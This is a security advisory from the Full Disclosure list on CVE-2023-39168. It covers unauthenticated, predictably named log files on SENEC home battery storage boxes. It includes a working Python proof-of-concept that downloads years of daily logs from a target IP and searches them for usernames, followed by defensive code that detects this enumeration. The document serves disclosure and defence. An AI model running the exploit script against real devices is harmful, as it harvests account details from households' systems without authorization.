> > Advisory ID: Ph0s-2023-002
> > Product: EnBw - SENEC legacy storage box: V1-V3
> > Manufacturer: SENEC - a part of EnBw
> > Affected Version(s): Firmware: all (as of 2023-06-19)
> > Tested Version(s): current
> > Vulnerability Type: CWE-200: Exposure of Sensitive Information to an
> > Unauthorized Actor
> >
> > Risk Level: CVSS v3.1 Vector:
> > AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N (7.5 High)
> >
> > Manufacturer Risk Level Rating:
> > AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:H/RL:T/RC:C
> > Overall CVSS Score: 7.2
> >
> > Solution Status: Fixed
> > Manufacturer Notification: 2023-06-05
> > Public Disclosure: 2023-11-01
> > CVE Reference: CVE-2023-39168
> > Author of Advisory: Ph0s[4], R0ckE7
> >
> > ********************************************************************************
> >
> > Overview:
> > Foreword:
> > This vulnerability was reported to the enbw-cert. We would like to
> > thank enbw-cert for taking care of the vulns and patching the systems.
> > We decided to publish when most of the reported vulns are patched
> > to make sure nobody is harmed when 3rd parties exploit the mentioned vulns.
> >
> > About Senec:
> > We are SENEC
> >
> > We have been the EnBW energy independence experts since 2018 – but we have
> > put our heart and soul into guiding customers on the route to independence
> > since SENEC was founded in 2009. Our passion lies in actively promoting the
> > energy transition with innovative ideas and pioneering products. And,
> > because we don’t do things by halves, our unwavering ambition is to create
> > integrated solutions that enable you to enjoy the highest possible degree
> > of independence and sustainability through self-generation of solar
> > electricity.
> >
> > About SENEC Home:
> >
> > SENEC.Home: The smart electricity storage device for your home
> >
> > SENEC.Home is the heart of your sustainable, affordable supply of solar
> > electricity. The smart battery storage device stores excess electricity
> > generated by your PV system so that you can use it when you need it – such as
> > when your household’s energy consumption rises in the evening, or on rainy days
> > when your PV system generates less power.
> >
> > ********************************************************************************
> >
> > Vulnerability Details:
> >
> > As already stated in CVE-2023-39167, no authentication is required to
> > access log information. Therefore, and due to the predictable URL scheme,
> > it is possible for an attacker to download all existing log files to
> > obtain the username.
> >
> > ********************************************************************************
> >
> > Proof of Concept (PoC):
> >
> > The attack consists of the following steps:
> >
> > 1. parse the script using this PoC Code to obtain the username:
> >
> > import argparse
> > import datetime
> > import os
> > import requests
> >
> >
> > def get_senec_logs(senec_ip, day_range, break_on_username):
> >     start_date = datetime.datetime.today()
> >     end_date = start_date - datetime.timedelta(days=day_range)
> >     delta = datetime.timedelta(days=1)
> >
> >     while end_date < start_date:
> >         try:
> >             senec_url = f"http://{senec_ip}/log/{start_date.strftime('%Y')}/" \
> >                         f"{start_date.strftime('%m')}/{start_date.strftime('%d')}.log"
> >             r = requests.get(senec_url)
> >             print(f"HTTP Status Code {r.status_code}: {senec_url}")
> >
> >             if r.status_code != 200: break
> >             if r.headers["Content-Length"] == "0": break
> >
> >             os.makedirs(os.path.dirname(senec_url.replace("http://", "")),
> >                         exist_ok=True)
> >             with open(senec_url.replace("http://", ""), "wb") as senec_log_file:
> >                 senec_log_file.write(r.content)
> >                 offset = r.content.find(bytes("username:", "utf-8"))
> >                 if offset != -1:
> >                     print(f"Username found in {senec_log_file.name} at offset {offset}")
> >                     if break_on_username: break
> >         except requests.ConnectionError:
> >             print("Failed to connect to SENEC.Inverter")
> >             break
> >         except Exception as e:
> >             print(f"An unhandled exception occurred:\n{e}")
> >             break
> >         start_date -= delta
> >
> >
> > if __name__ == '__main__':
> >     parser = argparse.ArgumentParser(description="Download SENEC.Inverter log files")
> >     parser.add_argument("ip", type=str, help="IP address of the target SENEC.Inverter")
> >     parser.add_argument("-b", "--break-on-username", action="store_true",
> >                         default=False, required=False,
> >                         help="stop downloading once a username is found")
> >     parser.add_argument("-d", "--day-range", type=int, action="store",
> >                         default=365 * 20, required=False,
> >                         help="number of days to download log files in reverse order starting today")
> >     args = parser.parse_args()
> >     get_senec_logs(args.ip, args.day_range, args.break_on_username)
> >
> > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> >
> > Solution:
> > Patched by Manufacturer
> > (Rolled out until September 11, 2023)
> >
> > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> >
> > Disclosure Timeline:
> >
> > 2022-06-01: Vulnerability discovered
> > 2023-06-05: Vulnerability reported to manufacturer
> > 2023-09-11: Patch rollout by manufacturer to affected devices
> > 2023-11-01: Public disclosure of vulnerability
> >
> > ************************************************************************
> >
> > Researcher:
> > Ph0s[4], R0ckE7
> >
> > ************************************************************************
> >
> > Disclaimer:
> >
> > The information provided in this security advisory is provided "as is"
> > and without warranty of any kind. Details of this security advisory may
> > be updated in order to provide as accurate information as possible.
> >
> > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> >
> > Copyright:
> >
> > Creative Commons - Attribution (by) - Version 4.0
> > URL: https://creativecommons.org/licenses/by/4.0/deed.en
> > _______________________________________________
> > Sent through the Full Disclosure mailing list
> > https://nmap.org/mailman/listinfo/fulldisclosure
> > Web Archives & RSS: https://seclists.org/fulldisclosure/
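The advisory above describes an unauthenticated, predictable per-day log URL (/log/YYYY/MM/DD.log). As an added example that is not part of the advisory, the following detection logic runs over access-log lines from a reverse proxy or gateway assumed to sit in front of the device: it parses Common Log Format entries (constructed sample data) and flags a client that successfully fetched several distinct daily log files within a short window, while ignoring requests that a patched device refused.

```python
import re
from collections import defaultdict
from datetime import datetime

# Per-day log path the advisory calls predictable: /log/YYYY/MM/DD.log
LOG_PATH_RE = re.compile(r"^/log/(\d{4})/(\d{2})/(\d{2})\.log$")
# Common Log Format line as an assumed reverse proxy in front of the device would write it
CLF_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')

def parse_clf(line):
    """Return (client, timestamp, method, path, status) or None if the line does not parse."""
    m = CLF_RE.match(line)
    if not m:
        return None
    client, ts, method, path, status = m.groups()
    return client, datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"), method, path, int(status)

def detect_log_enumeration(lines, min_days=3, window_s=300):
    """Flag clients that fetched >= min_days distinct daily logs with HTTP 200 inside any
    window_s-second window; 401/403 replies from a device that now requires auth do not count."""
    hits = defaultdict(list)  # client -> [(timestamp, "YYYY-MM-DD"), ...]
    for client, when, method, path, status in filter(None, map(parse_clf, lines)):
        m = LOG_PATH_RE.match(path)
        if method == "GET" and status == 200 and m:
            hits[client].append((when, "-".join(m.groups())))
    flagged = {}
    for client, events in hits.items():
        events.sort()
        for i, (t0, _) in enumerate(events):
            window = [e for e in events[i:] if (e[0] - t0).total_seconds() <= window_s]
            days = {day for _, day in window}
            if len(days) >= min_days:
                flagged[client] = {"days": len(days), "first": t0, "last": window[-1][0]}
                break
    return flagged

# Constructed sample: one client walks three days backwards within seconds, one fetches a
# single day's log, and one is refused by a device that now requires authentication.
SAMPLE_LOG = [
    '203.0.113.9 - - [19/Jun/2023:10:00:01 +0200] "GET /log/2023/06/19.log HTTP/1.1" 200 5120',
    '203.0.113.9 - - [19/Jun/2023:10:00:02 +0200] "GET /log/2023/06/18.log HTTP/1.1" 200 4871',
    '203.0.113.9 - - [19/Jun/2023:10:00:03 +0200] "GET /log/2023/06/17.log HTTP/1.1" 200 4990',
    '192.0.2.10 - - [19/Jun/2023:10:05:00 +0200] "GET /log/2023/06/19.log HTTP/1.1" 200 5120',
    '198.51.100.7 - - [19/Jun/2023:11:00:00 +0200] "GET /log/2023/06/19.log HTTP/1.1" 401 0',
    '198.51.100.7 - - [19/Jun/2023:11:00:01 +0200] "GET /log/2023/06/18.log HTTP/1.1" 401 0',
    '198.51.100.7 - - [19/Jun/2023:11:00:02 +0200] "GET /log/2023/06/17.log HTTP/1.1" 401 0',
]
```

Running `detect_log_enumeration(SAMPLE_LOG)` reports only 203.0.113.9; the single legitimate fetch and the refused requests stay below the threshold.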